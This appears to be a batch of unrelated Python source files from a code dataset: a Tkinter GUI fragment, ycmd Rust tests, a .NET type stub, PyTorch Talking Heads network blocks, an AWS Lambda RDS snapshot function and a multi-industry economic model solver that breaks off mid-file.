entry= Text(root)
entry.place(x=100,y=200)
prevBtn= Button(root, text = '<', command = prev)
prevBtn.place(x=120,y=600)
button1= Button(root, text = 'Submit', command = enFunc)
button1.place(x=400,y=600)
nextBtn= Button(root, text = '>', command = nex)
nextBtn.place(x=700,y=600)
finishbtn=Button(root,text='Finish',command=finish)
finishbtn.place(x=400,y=650)
root.mainloop()
| 5,729 | 2,131 |
# Copyright (C) 2015-2018 ycmd contributors
#
# This file is part of ycmd.
#
# ycmd is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ycmd is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with ycmd. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
# Not installing aliases from python-future; it's unreliable and slow.
from builtins import * # noqa
from hamcrest import assert_that, contains, has_entry
from mock import patch
from nose.tools import eq_
from ycmd.tests.rust import IsolatedYcmd, PathToTestFile, SharedYcmd
from ycmd.tests.test_utils import ( BuildRequest,
MockProcessTerminationTimingOut,
WaitUntilCompleterServerReady )
from ycmd.utils import ReadFile
@SharedYcmd
def RunGoToTest( app, params ):
filepath = PathToTestFile( 'test.rs' )
contents = ReadFile( filepath )
command = params[ 'command' ]
goto_data = BuildRequest( completer_target = 'filetype_default',
command_arguments = [ command ],
line_num = 7,
column_num = 12,
contents = contents,
filetype = 'rust',
filepath = filepath )
results = app.post_json( '/run_completer_command',
goto_data )
eq_( {
'line_num': 1, 'column_num': 8, 'filepath': filepath
}, results.json )
def Subcommands_GoTo_all_test():
tests = [
{ 'command': 'GoTo' },
{ 'command': 'GoToDefinition' },
{ 'command': 'GoToDeclaration' }
]
for test in tests:
yield RunGoToTest, test
@SharedYcmd
def Subcommands_GetDoc_Method_test( app ):
filepath = PathToTestFile( 'docs.rs' )
contents = ReadFile( filepath )
event_data = BuildRequest( filepath = filepath,
filetype = 'rust',
line_num = 7,
column_num = 9,
contents = contents,
command_arguments = [ 'GetDoc' ],
completer_target = 'filetype_default' )
response = app.post_json( '/run_completer_command', event_data ).json
eq_( response, {
'detailed_info': 'pub fn fun()\n---\n'
'some docs on a function'
} )
@SharedYcmd
def Subcommands_GetDoc_Fail_Method_test( app ):
filepath = PathToTestFile( 'docs.rs' )
contents = ReadFile( filepath )
# no docs exist for this function
event_data = BuildRequest( filepath = filepath,
filetype = 'rust',
line_num = 8,
column_num = 9,
contents = contents,
command_arguments = [ 'GetDoc' ],
completer_target = 'filetype_default' )
response = app.post_json(
'/run_completer_command',
event_data,
expect_errors=True ).json
eq_( response[ 'exception' ][ 'TYPE' ], 'RuntimeError' )
eq_( response[ 'message' ], 'Can\'t lookup docs.' )
@IsolatedYcmd()
@patch( 'ycmd.utils.WaitUntilProcessIsTerminated',
MockProcessTerminationTimingOut )
def Subcommands_StopServer_Timeout_test( app ):
WaitUntilCompleterServerReady( app, 'rust' )
app.post_json(
'/run_completer_command',
BuildRequest(
filetype = 'rust',
command_arguments = [ 'StopServer' ]
)
)
request_data = BuildRequest( filetype = 'rust' )
assert_that( app.post_json( '/debug_info', request_data ).json,
has_entry(
'completer',
has_entry( 'servers', contains(
has_entry( 'is_running', False )
) )
) )
| 4,364 | 1,275 |
class FontFamilyConverter(TypeConverter):
"""
Converts instances of the System.String type to and from System.Windows.Media.FontFamily instances.
FontFamilyConverter()
"""
def CanConvertFrom(self,*__args):
"""
CanConvertFrom(self: FontFamilyConverter,td: ITypeDescriptorContext,t: Type) -> bool
Determines whether a class can be converted from a given type to an instance of
System.Windows.Media.FontFamily.
td: Describes the context information of a type.
t: The type of the source that is being evaluated for conversion.
Returns: true if the converter can convert from the specified type to an instance of
System.Windows.Media.FontFamily; otherwise,false.
"""
pass
def CanConvertTo(self,*__args):
"""
CanConvertTo(self: FontFamilyConverter,context: ITypeDescriptorContext,destinationType: Type) -> bool
Determines whether an instance of System.Windows.Media.FontFamily can be
converted to a different type.
context: Describes the context information of a type.
destinationType: The desired type that this instance of System.Windows.Media.FontFamily is being
evaluated for conversion.
Returns: true if the converter can convert this instance of
System.Windows.Media.FontFamily to the specified type; otherwise,false.
"""
pass
def ConvertFrom(self,*__args):
"""
ConvertFrom(self: FontFamilyConverter,context: ITypeDescriptorContext,cultureInfo: CultureInfo,o: object) -> object
Attempts to convert a specified object to an instance of
System.Windows.Media.FontFamily.
context: Describes the context information of a type.
cultureInfo: Cultural-specific information that should be respected during conversion.
o: The object being converted.
Returns: The instance of System.Windows.Media.FontFamily that is created from the
converted o parameter.
"""
pass
def ConvertTo(self,*__args):
"""
ConvertTo(self: FontFamilyConverter,context: ITypeDescriptorContext,culture: CultureInfo,value: object,destinationType: Type) -> object
Attempts to convert a specified object to an instance of
System.Windows.Media.FontFamily.
context: Describes the context information of a type.
culture: Cultural-specific information that should be respected during conversion.
value: The object being converted.
destinationType: The type that this instance of System.Windows.Media.FontFamily is converted to.
Returns: The object that is created from the converted instance of
System.Windows.Media.FontFamily.
"""
pass
| 2,684 | 751 |
"""
Demonstrating simple global variables
File: E5_global_variables_version_b.py
Author: Charles Stanier, charles-stanier@uiowa.edu
Date: August 14, 2019
Written/Tested In: Python 3.7.3
Program Objective: Demonstrate the use of global variable for constant
Modifications: none so far
"""
# these two lines of code make sure we clear the variable space
# this causes an error from spyder at the end of running the script
# but I would ignore it
from IPython import get_ipython
get_ipython().magic('reset -f')
def print_number( val ):
if cfg.exclaim_flag == True:
print('The value is ', val, '!!!!')
else:
print('The value is ', val)
# main script
import myconfig as cfg # import configuration parameters
print_number(3.9) | 805 | 272 |
X_VAR = ["Tx", "Ty", "Wx", "Wy", "u_av", "v_av", "lon", "lat", "t"]
Y_VAR = ["u", "v"]
mpl_config = {
"text.usetex": True,
"font.size": 12,
"text.latex.preamble": r"\usepackage{amsmath}",
"font.family": "Times New Roman",
}
| 240 | 111 |
""" In this file, PyTorch modules are defined to be used in the Talking Heads model. """
import torch
import torch.nn as nn
from torch.nn import functional as F
def init_conv(conv):
nn.init.xavier_uniform_(conv.weight)
if conv.bias is not None:
conv.bias.data.zero_()
# region General Blocks
class SelfAttention(nn.Module):
def __init__(self, in_dim):
super(SelfAttention, self).__init__()
self.query_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim // 8, kernel_size=1)
self.key_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim // 8, kernel_size=1)
self.value_conv = nn.Conv2d(in_channels=in_dim, out_channels=in_dim, kernel_size=1)
self.gamma = nn.Parameter(torch.rand(1).normal_(0.0, 0.02))
self.softmax = nn.Softmax(dim=-1)
def forward(self, x):
# B: mini batches, C: channels, W: width, H: height
B, C, H, W = x.shape
proj_query = self.query_conv(x).view(B, -1, W * H).permute(0, 2, 1) # B X CX(N)
proj_key = self.key_conv(x).view(B, -1, W * H) # B X C x (*W*H)
energy = torch.bmm(proj_query, proj_key) # transpose check
attention = self.softmax(energy) # BX (N) X (N)
proj_value = self.value_conv(x).view(B, -1, W * H) # B X C X N
out = torch.bmm(proj_value, attention.permute(0, 2, 1))
out = out.view(B, C, H, W)
out = self.gamma * out + x
return out
class ConvLayer(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride, padding=None):
super(ConvLayer, self).__init__()
if padding is None:
padding = kernel_size // 2
self.reflection_pad = nn.ReflectionPad2d(padding)
self.conv2d = nn.utils.spectral_norm(nn.Conv2d(in_channels, out_channels, kernel_size, stride))
def forward(self, x):
out = self.reflection_pad(x)
out = self.conv2d(out)
return out
class AdaIn(nn.Module):
def __init__(self):
super(AdaIn, self).__init__()
self.eps = 1e-5
def forward(self, x, mean_style, std_style):
B, C, H, W = x.shape
feature = x.view(B, C, -1)
std_feat = (torch.std(feature, dim=2) + self.eps).view(B, C, 1)
#std_feat = torch.var(feature, dim=2) + self.eps
#std_feat = std_feat.sqrt().view(B, C, 1)
mean_feat = torch.mean(feature, dim=2).view(B, C, 1)
adain = std_style * (feature - mean_feat) / std_feat + mean_style
adain = adain.view(B, C, H, W)
return adain
# endregion
# region Non-Adaptive Residual Blocks
class ResidualBlockDown(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=None):
super(ResidualBlockDown, self).__init__()
# Right Side
self.conv_r1 = ConvLayer(in_channels, out_channels, kernel_size, stride, padding)
self.conv_r2 = ConvLayer(out_channels, out_channels, kernel_size, stride, padding)
# Left Side
self.conv_l = ConvLayer(in_channels, out_channels, 1, 1)
def forward(self, x):
residual = x
# Right Side
out = F.relu(x)
out = self.conv_r1(out)
out = F.relu(out)
out = self.conv_r2(out)
out = F.avg_pool2d(out, 2)
# Left Side
residual = self.conv_l(residual)
residual = F.avg_pool2d(residual, 2)
# Merge
out = residual + out
return out
class ResidualBlockUp(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, upsample=2):
super(ResidualBlockUp, self).__init__()
# General
self.upsample = nn.Upsample(scale_factor=upsample, mode='nearest')
# Right Side
self.norm_r1 = nn.InstanceNorm2d(in_channels, affine=True)
self.conv_r1 = ConvLayer(in_channels, out_channels, kernel_size, stride)
self.norm_r2 = nn.InstanceNorm2d(out_channels, affine=True)
self.conv_r2 = ConvLayer(out_channels, out_channels, kernel_size, stride)
# Left Side
self.conv_l = ConvLayer(in_channels, out_channels, 1, 1)
def forward(self, x):
residual = x
# Right Side
out = self.norm_r1(x)
out = F.relu(out)
out = self.upsample(out)
out = self.conv_r1(out)
out = self.norm_r2(out)
out = F.relu(out)
out = self.conv_r2(out)
# Left Side
residual = self.upsample(residual)
residual = self.conv_l(residual)
# Merge
out = residual + out
return out
class ResidualBlock(nn.Module):
def __init__(self, channels):
super(ResidualBlock, self).__init__()
self.conv1 = ConvLayer(channels, channels, kernel_size=3, stride=1)
self.in1 = nn.InstanceNorm2d(channels, affine=True)
self.conv2 = ConvLayer(channels, channels, kernel_size=3, stride=1)
self.in2 = nn.InstanceNorm2d(channels, affine=True)
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.in1(out)
out = F.relu(out)
out = self.conv2(out)
out = self.in2(out)
out = out + residual
return out
# endregion
# region Adaptive Residual Blocks
class AdaptiveResidualBlockUp(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, upsample=2):
super(AdaptiveResidualBlockUp, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
# General
self.upsample = nn.Upsample(scale_factor=upsample, mode='nearest')
# Right Side
self.norm_r1 = AdaIn()
self.conv_r1 = ConvLayer(in_channels, out_channels, kernel_size, stride)
self.norm_r2 = AdaIn()
self.conv_r2 = ConvLayer(out_channels, out_channels, kernel_size, stride)
# Left Side
self.conv_l = ConvLayer(in_channels, out_channels, 1, 1)
def forward(self, x, mean1, std1, mean2, std2):
residual = x
# Right Side
out = self.norm_r1(x, mean1, std1)
out = F.relu(out)
out = self.upsample(out)
out = self.conv_r1(out)
out = self.norm_r2(out, mean2, std2)
out = F.relu(out)
out = self.conv_r2(out)
# Left Side
residual = self.upsample(residual)
residual = self.conv_l(residual)
# Merge
out = residual + out
return out
class AdaptiveResidualBlock(nn.Module):
def __init__(self, channels):
super(AdaptiveResidualBlock, self).__init__()
self.conv1 = ConvLayer(channels, channels, kernel_size=3, stride=1)
self.in1 = AdaIn()
self.conv2 = ConvLayer(channels, channels, kernel_size=3, stride=1)
self.in2 = AdaIn()
def forward(self, x, mean1, std1, mean2, std2):
residual = x
out = self.conv1(x)
out = self.in1(out, mean1, std1)
out = F.relu(out)
temp = out
out = self.conv2(out)
out = self.in2(out, mean1, std1)
out = out + residual
return out
# endregion
| 7,121 | 2,675 |
import botocore
import datetime
import re
import logging
import boto3
region='us-west-1'
db_instance_class='db.m4.large'
db_subnet='default'
instances = ['master']
print('Loading function')
def lambda_handler(event, context):
source = boto3.client('rds', region_name=region)
for instance in instances:
try:
#timestamp1 = '{%Y-%m-%d %H:%M:%S}'.format(datetime.datetime.now())
timestamp1 = str(datetime.datetime.now().strftime('%Y-%m-%d-%H-%-M-%S')) + "lambda-snap"
snapshot = "{0}-{1}-{2}".format("mysnapshot", instance,timestamp1)
response = source.create_db_snapshot(DBSnapshotIdentifier=snapshot, DBInstanceIdentifier=instance)
print(response)
except botocore.exceptions.ClientError as e:
raise Exception("Could not create snapshot: %s" % e) | 869 | 270 |
'''
------------------------------------------------------------------------
This program runs the steady state solver as well as the time path
solver for the OG model with S-period lived agents, exogenous labor,
M industries, and I goods.
This Python script calls the following other file(s) with the associated
functions:
sfuncs.py
feasible
SS
tpfuncs.py
TPI
------------------------------------------------------------------------
'''
# Import packages
import time
import numpy as np
import scipy.optimize as opt
import pandas as pd
import ssfuncs_static as ssf
reload(ssf)
import tpfuncs_static as tpf
reload(tpf)
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.ticker import MultipleLocator, FormatStrFormatter
from mpl_toolkits.mplot3d import Axes3D
'''
------------------------------------------------------------------------
Declare parameters
------------------------------------------------------------------------
S = integer in [3,80], number of periods an individual lives
T = integer > S, number of time periods until steady state
I = integer, number of consumption goods
alpha = [I,] vector, ith element is the expenditure share on
good i (elements must sum to one)
c_bar = [I,] vector, ith element is the minimum consumption
amount for good i
beta_ann = scalar in [0,1), discount factor for one year
beta = scalar in [0,1), discount factor for each model period
sigma = scalar > 0, coefficient of relative risk aversion
n = [S,] vector, exogenous labor supply n_{s,t}
M = integer, number of production industries
A = [M,] vector, mth element is the total factor productivity
values for the mth industry
gamma = [M,] vector, mth element is capital's share of income
for the mth industry
epsilon = [M,] vector, mth element is the elasticity of substitution
between capital and labor for the mth industry
delta_annual = [M,] vector, mth element is the one-year physical depreciation
rate of capital in the mth industry
delta = [M,] vector, mth element is the model-period physical depreciation
rate of capital in the mth industry
xi = [M,M] matrix, element i,j gives the fraction of capital used by
industry j that comes from the output of industry i
pi = [I,M] matrix, element i,j gives the fraction of consumption
good i that comes from the output of industry j
ss_tol = scalar > 0, tolerance level for steady-state fsolve
ss_graphs = boolean, =True if want graphs of steady-state objects
tp_solve = boolean, =True if want to solve TPI after solving SS
tp_tol = scalar > 0, tolerance level for fsolve's in TP
tp_graphs = boolean, =True if want graphs of TP objects
------------------------------------------------------------------------
'''
# Household parameters
S = int(80)
T = 220
beta_annual = 0.96
beta = beta_annual ** (80 / S)
sigma = 3.0
n = np.zeros(S)
n[:int(round(2 * S / 3))] = 1.
n[int(round(2 * S / 3)):] = 0.9
# Model calibation parameters
FR1993_calib = False # if True, then calibration firm params to
# Fullerton and Rogers (Brookings, 1993)
if FR1993_calib == True:
# Specify model dimensions
I = 17 # number of consumption goods
M = 19 # number of production industries
# Read in parameters from Fullerton and Rogers (1993) from excel file
xi_sheet = pd.read_excel('Firm_Parameters_FullertonRogers.xlsx', sheetname='xi')
xi = xi_sheet.as_matrix() # turn into numpy array
xi=xi[0:19,1:20] # keep only cells interested in
xi=xi.astype(float) # make sure type is float
xi = (xi/np.tile(xi.sum(0),(M,1))).transpose() # make xi so fractions and so rows are capital used in and columns are capital supplied in (MxM)
#print 'xi sum check: ', xi.sum(1)
pi_sheet = pd.read_excel('Firm_Parameters_FullertonRogers.xlsx', sheetname='pi')
pi = pi_sheet.as_matrix()
pi=pi[0:19,1:18]
pi=pi.astype(float)
pi = (pi/np.tile(pi.sum(0),(M,1))).transpose() # make pi so fractions and so rows are consumption goods and columns are output industries in (IxM)
#print 'pi sum check: ', pi.sum(1)
delta_sheet = pd.read_excel('Firm_Parameters_FullertonRogers.xlsx', sheetname='delta')
delta = delta_sheet.as_matrix()
delta=delta[0:19,1]
delta=delta.astype(float)
#print 'delta shape: ', delta.shape
gamma_sheet = pd.read_excel('Firm_Parameters_FullertonRogers.xlsx', sheetname='gamma')
gamma = gamma_sheet.as_matrix()
gamma=gamma[0:19,1]
gamma=gamma.astype(float)
epsilon_sheet = pd.read_excel('Firm_Parameters_FullertonRogers.xlsx', sheetname='epsilon')
epsilon = epsilon_sheet.as_matrix()
epsilon=epsilon[0:19,1]
epsilon=epsilon.astype(float)
alpha_sheet = pd.read_excel('Firm_Parameters_FullertonRogers.xlsx', sheetname='alpha')
alpha = alpha_sheet.as_matrix()
alpha =alpha[0:17,1]
alpha =alpha.astype(float)
alpha = alpha/alpha.sum() # ensure the alpha vector sums to one
cbar_sheet = pd.read_excel('Firm_Parameters_FullertonRogers.xlsx', sheetname='cbar')
c_bar = cbar_sheet.as_matrix()
c_bar =c_bar[0:17,1]
c_bar =c_bar.astype(float)
# No TFP from FR1993, so just set to one for all
A = np.ones((M,))
else:
# Firm/consumption parameters
I = 2
alpha = np.array([0.4,0.6])
#c_bar = np.array([0.6, 0.6])
c_bar = np.array([0.0, 0.0])
M = 2
A = np.array([1, 1.2])
gamma = np.array([0.15, 0.2])
epsilon = np.array([0.6, 0.6])
delta_annual = np.array([0.04,0.05])
delta = 1 - ((1-delta_annual)**(80/S))
xi = np.array([[1.0, 0.0],[0.0, 1.0] ])
pi = np.array([[1.0, 0.0],[0.0, 1.0] ])
# M = 3
# A = np.array([1, 1.2, 0.9])
# gamma = np.array([0.3, 0.25, 0.4])
# delta = np.array([0.1, 0.12, 0.15])
# epsilon = np.array([0.55, 0.6, 0.62])
# pi = np.array([[0.4, 0.3, 0.3],[0.1, 0.8, 0.1]])
# xi = np.array([[0.2, 0.6, 0.2],[0.0, 0.2, 0.8], [0.6, 0.2, 0.2] ])
# SS parameters
ss_tol = 1e-13
ss_graphs = False
# TP parameters
tp_solve = True
tp_graphs = False
tp_tol = 1e-9 # tolerance for fsolve for TP and for HH prob along time path
'''
------------------------------------------------------------------------
Compute the steady state
------------------------------------------------------------------------
rbar_init = scalar > 1, initial guess for steady-state model period
interest rate
wbar_init = scalar > 1, initial guess for steady-state real wage
rwbar_init = [2,] vector, initial guesses for steady-state r and w
feas_params = length 5 tuple, parameters for feasible function:
(S, alpha, beta, sigma, ss_tol)
b_guess = [S-1,] vector, initial guess for savings to use in fsolve
in ssf.get_cbess
GoodGuess = boolean, =True if initial steady-state guess is feasible
r_cstr_ss = boolean, =True if initial r + delta <= 0
w_cstr_ss = boolean, =True if initial w <= 0
c_tilde_cstr_ss = [S,] boolean vector, =True if c_tilde_{s}<=0 for initial r and w
c_cstr_ss = [I, S] boolean matrix, =True if c_{i,s}<=0 for initial r
and w
K_cstr_ss = boolean, =True if sum of K_{m}<=0 for initial r and w
ss_params = length 5 tuple, parameters for SS function:
(S, alpha, beta, sigma, ss_tol)
r_ss = scalar, steady-state interest rate
w_ss = scalar > 0, steady-state wage
p_c_ss = [I,] vector, steady-state prices for each consumption good
p_tilde_ss = scalar > 0, steady-state composite good price
b_ss = [S-1,] vector, steady-state savings
c_tilde_ss = [S,] vector, steady-state composite consumption
c_ss = [I,S] matrix, steady-state consumption of each good
eul_ss = [S-1,] vector, steady-state Euler errors
Cm_ss = [M,] vector, total demand for goods from each industry
X_ss = [M,] vector, steady-state total output for each industry
K_ss = [M,] vector, steady-state capital demand for each industry
L_ss = [M,] vector, steady-state labor demand for each industry
MCK_err_ss = scalar, steady-state capital market clearing error
MCL_err_ss = scalar, steady-state labor market clearing error
ss_time = scalar, number of seconds to compute SS solution
rcdiff_ss = [M,] vector, steady-state difference in goods market
clearing (resource constraint) in each industry
------------------------------------------------------------------------
'''
# Make sure initial guess of r and w is feasible
rbar_init = ((1 + 0.04) ** (80 / S)) - 1
wbar_init = 1.
rwbar_init = np.array([rbar_init, wbar_init])
feas_params = (S, alpha, beta, sigma, ss_tol)
b_guess = np.zeros(S-1)
b_guess[:int(round(2 * S / 3))] = \
(np.linspace(0.003, 0.3, int(round(2 * S / 3))))
b_guess[int(round(2 * S / 3)):] = \
(np.linspace(0.3, 0.003, S - 1 - int(round(2 * S / 3))))
GoodGuess, r_cstr_ss, w_cstr_ss, c_tilde_cstr_ss, c_cstr_ss, K_cstr_ss \
= ssf.feasible(feas_params, rwbar_init, b_guess, c_bar, A,
gamma, epsilon, delta, pi, I, S, n)
if r_cstr_ss == True and w_cstr_ss == True:
print 'Initial guess is not feasible because both r + delta, w <= 0.'
elif r_cstr_ss == True and w_cstr_ss == False:
print 'Initial guess is not feasible because r + delta <= 0.'
elif r_cstr_ss == False and w_cstr_ss == True:
print 'Initial guess is not feasible because w <= 0.'
elif (r_cstr_ss == False and w_cstr_ss == False and c_tilde_cstr_ss.max() == 1
and K_cstr_ss == False):
print 'Initial guess is not feasible because c_tilde_{s}<=0 for some s.'
elif (r_cstr_ss == False and w_cstr_ss == False and c_tilde_cstr_ss.max() == 1
and K_cstr_ss == True):
print 'Initial guess is not feasible because c_tilde_{s}<=0 for some s and sum of K_{m}<=0.'
elif (r_cstr_ss == False and w_cstr_ss == False and c_tilde_cstr_ss.max() == 0
and c_cstr_ss.max() == 1 and K_cstr_ss == False):
print 'Initial guess is not feasible because c_{i,s}<=0 for some i and s.'
elif (r_cstr_ss == False and w_cstr_ss == False and c_tilde_cstr_ss.max() == 0
and c_cstr_ss.max() == 1 and K_cstr_ss == True):
print 'Initial guess is not feasible because c_{i,s}<=0 for some i and s and sum of K_{m}<=0.'
elif (r_cstr_ss == False and w_cstr_ss == False and c_tilde_cstr_ss.max() == 0
and c_cstr_ss.max() == 0 and K_cstr_ss == True):
print 'Initial guess is not feasible because sum of K_{m}<=0.'
elif GoodGuess == True:
print 'Initial guess is feasible.'
# Compute steady state
print 'BEGIN STEADY STATE COMPUTATION'
ss_params = (S, alpha, beta, sigma, ss_tol)
(r_ss, w_ss, p_c_ss, p_tilde_ss, b_ss, c_tilde_ss, c_ss, eul_ss, C_ss, X_ss,
K_ss, L_ss, MCK_err_ss, MCL_err_ss, ss_time) = \
ssf.SS(ss_params, rwbar_init, b_guess, c_bar, A,
gamma, epsilon, delta, xi, pi, I, M, S, n, ss_graphs)
# Print diagnostics
print 'The maximum absolute steady-state Euler error is: ', \
np.absolute(eul_ss).max()
print 'The capital and labor market clearing errors are: ', \
(MCK_err_ss, MCL_err_ss)
print 'The steady-state distribution of capital is:'
print b_ss
print 'The steady-state distribution of composite consumption is:'
print c_tilde_ss
print 'The steady-state distribution of goods consumption is:'
print c_ss
print 'The steady-state interest rate and wage:'
print np.array([r_ss, w_ss])
print 'Steady-state consumption good prices and composite price are:'
print p_c_ss, p_tilde_ss
print 'Aggregate output, capital stock and consumption for each industry/consumption good are:'
print np.array([[X_ss], [K_ss], [C_ss]])
RCdiff_ss = X_ss - (np.dot(np.reshape(C_ss,(1,I)),pi)) - (np.dot(delta*K_ss,xi))
print 'The difference in the resource constraints are: ', RCdiff_ss
# Print SS computation time
if ss_time < 60: # seconds
secs = round(ss_time, 3)
print 'SS computation time: ', secs, ' sec'
elif ss_time >= 60 and ss_time < 3600: # minutes
mins = int(ss_time / 60)
secs = round(((ss_time / 60) - mins) * 60, 1)
print 'SS computation time: ', mins, ' min, ', secs, ' sec'
elif ss_time >= 3600 and ss_time < 86400: # hours
hrs = int(ss_time / 3600)
mins = int(((ss_time / 3600) - hrs) * 60)
secs = round(((ss_time / 60) - mins) * 60, 1)
print 'SS computation time: ', hrs, ' hrs, ', mins, ' min, ', secs, ' sec'
elif ss_time >= 86400: # days
days = int(ss_time / 86400)
hrs = int(((ss_time / 86400) - days) * 24)
mins = int(((ss_time / 3600) - hrs) * 60)
secs = round(((ss_time / 60) - mins) * 60, 1)
print 'SS computation time: ', days, ' days,', hrs, ' hrs, ', mins, ' min, ', secs, ' sec'
'''
--------------------------------------------------------------------
Compute the equilibrium time path by TPI
--------------------------------------------------------------------
Gamma1 = [S-1,] vector, initial period savings distribution
rpath_init = [T+S-1,] vector, initial guess for the time path of
the interest rate
r1 = scalar > 0, guess for period 1 value of r
cc_r = scalar, parabola coefficient for rpath_init
bb_r = scalar, parabola coefficient for rpath_init
aa_r = scalar, parabola coefficient for rpath_init
wpath_init = [T+S-1,] vector, initial guess for the time path of
the wage
w1 = scalar > 0, guess for period 1 value of w
cc_w = scalar, parabola coefficient for wpath_init
bb_w = scalar, parabola coefficient for wpath_init
aa_w = scalar, parabola coefficient for wpath_init
tp_params = length 11 tuple, parameters to pass into TP function:
(S, T, alpha_path, beta, sigma, r_ss, w_ss, tp_tol)
alpha_path = [I,T+S-2] matrix, consumption good shares in each
period along time path
c_bar_path = [I,T+S-2] matrix, minimum consumption amounts in each
period along time path
A_path = [M,T+S-2] matrix, TFP for each industry in each
period along time path
gamma_path = [M,T+S-2] matrix, capital's share of output for each industry in each
period along time path
epsilon_path = [M,T+S-2] matrix, elasticity of substitution for each industry in each
period along time path
delta_path = [M,T+S-2] matrix, physical depreciation for each industry in each
period along time path
r_path = [T+S-2,] vector, equilibrium time path of the interest
rate
w_path = [T+S-2,] vector, equilibrium time path of the wage
pm_path = [M, T+S-2] matrix, equilibrium time path of industry
output prices
pc_path = [I, T+S-2] matrix, equilibrium time path of consumption
good prices
p_tilde_path = [T+S-2,] vector, equilibrium time path of the
composite good price
b_path = [S-1, T+S-2] matrix, equilibrium time path of the
distribution of savings. Period 1 is the initial
exogenous distribution
c_tilde_path = [S, T+S-2] matrix, equilibrium time path of the
distribution of composite good consumption
c_path = [S, T+S-2, I] array, equilibrium time path of the
distribution of individual consumption goods
eul_path = [S-1, T+S-2] matrix, equilibrium time path of the
euler errors associated with the distribution of
savings. Period 1 is a column of zeros
C_path = [I, T+S-2] matrix, equilibrium time path of total
demand for each consumption good
X_path = [M, T+S-2] matrix, equilibrium time path of total
output from each industry
K_path = [M, T+S-2] matrix, equilibrium time path of capital
demand for each industry
L_path = [M, T+S-2] matrix, equilibrium time path of labor
demand for each industry
Inv_path = [M,T+S-2] matrix, equilibrium time path for investment
demand from each industry
X_c_path = [M,T+S-2] matrix, equlibirum time path for demand
for output from each industry from consumption demand
X_inv_path = [M,T+S-2] matrix, equlibirum time path for demand
for output from each industry from investment demand
MCKerr_path = [T+S-2,] vector, equilibrium time path of capital
market clearing errors
MCLerr_path = [T+S-2,] vector, equilibrium time path of labor market
clearing errors
tpi_time = scalar, number of seconds to solve for transition path
ResmDiff = [M, T-1] matrix, errors in the resource constraint
from period 1 to T-1. We don't use T because we are
missing one individual's consumption in that period
--------------------------------------------------------------------
'''
if tp_solve == True:
print 'BEGIN EQUILIBRIUM TIME PATH COMPUTATION'
#Gamma1 = b_ss
Gamma1 = 0.95 * b_ss
# Make sure initial savings distr. is feasible (sum of b_{s}>0)
if Gamma1.sum() <= 0:
print 'Initial savings distribution is not feasible (sum of b_{s}<=0)'
else:
# Choose initial guesses of path of interest rate and wage.
# Use parabola specification aa*x^2 + bb*x + cc
# rpath_init = r_ss * np.ones(T+S-1)
rpath_init = np.zeros(T+S-1)
r1 = 1.02 * r_ss
cc_r = r1
bb_r = - 2 * (r1 - r_ss) / (T - S)
aa_r = -bb_r / (2 * (T - S))
rpath_init[:T-S+1] = (aa_r * (np.arange(0, T-S+1) ** 2) +
(bb_r * np.arange(0, T-S+1)) + cc_r)
rpath_init[T-S+1:] = r_ss
#rpath_init[:] = r_ss
wpath_init = np.zeros(T+S-1)
w1 = 0.98 * w_ss
cc_w = w1
bb_w = - 2 * (w1 - w_ss) / (T - S)
aa_w = -bb_w / (2 * (T - S))
wpath_init[:T-S+1] = (aa_w * (np.arange(0, T-S+1) ** 2) +
(bb_w * np.arange(0, T-S+1)) + cc_w)
wpath_init[T-S+1:] = w_ss
#wpath_init[:] = w_ss
# Solve for time path
# Tile arrays of time path parameters so easy to handle in
# TP functions
alpha_path = np.tile(np.reshape(alpha,(I,1)),(1,len(rpath_init)))
c_bar_path = np.tile(np.reshape(c_bar,(I,1)),(1,len(rpath_init)))
A_path = np.tile(np.reshape(A,(M,1)),(1,len(rpath_init)))
gamma_path = np.tile(np.reshape(gamma,(M,1)),(1,len(rpath_init)))
epsilon_path = np.tile(np.reshape(epsilon,(M,1)),(1,len(rpath_init)))
delta_path = np.tile(np.reshape(delta,(M,1)),(1,len(rpath_init)))
tp_params = (S, T, alpha_path, beta, sigma, r_ss, w_ss, tp_tol)
guesses = np.append(rpath_init[:T], wpath_init[:T])
start_time = time.clock()
solutions = opt.fsolve(tpf.TP_fsolve, guesses, args=(tp_params, K_ss, X_ss,
Gamma1, c_bar_path, A_path, gamma_path, epsilon_path, delta_path, xi, pi, I, M, S, n,
tp_graphs), xtol=tp_tol, col_deriv=1)
#solutions = tpf.TP_fsolve(guesses, tp_params, K_ss, X_ss,
# Gamma1, c_bar_path, A_path, gamma_path, epsilon_path, delta_path, xi, pi, I, M, S, n,
# tp_graphs)
tpi_time = time.clock() - start_time
rpath = solutions[:T].reshape(T)
wpath = solutions[T:].reshape(T)
# run one iteration of TP with fsolve solution to get other output
tp_params = (S, T, alpha_path, beta, sigma, r_ss, w_ss, tp_tol)
(r_path, w_path, pc_path, p_tilde_path, b_path, c_tilde_path, c_path,
eul_path, C_path, X_path, K_path, L_path,
MCKerr_path, MCLerr_path, RCdiff_path) = \
tpf.TP(tp_params, rpath, wpath, K_ss, X_ss,
Gamma1, c_bar_path, A_path, gamma_path, epsilon_path, delta_path, xi, pi, I,
M, S, n, tp_graphs)
# Print diagnostics
print 'The max. absolute difference in the resource constraints are:'
print np.absolute(RCdiff_path).max(axis=1)
print 'The max. absolute error in the market clearing conditions are:'
print np.absolute(MCKerr_path).max(), np.absolute(MCLerr_path).max()
# Print TPI computation time
if tpi_time < 60: # seconds
secs = round(tpi_time, 3)
print 'TPI computation time: ', secs, ' sec'
elif tpi_time >= 60 and tpi_time < 3600: # minutes
mins = int(tpi_time / 60)
secs = round(((tpi_time / 60) - mins) * 60, 1)
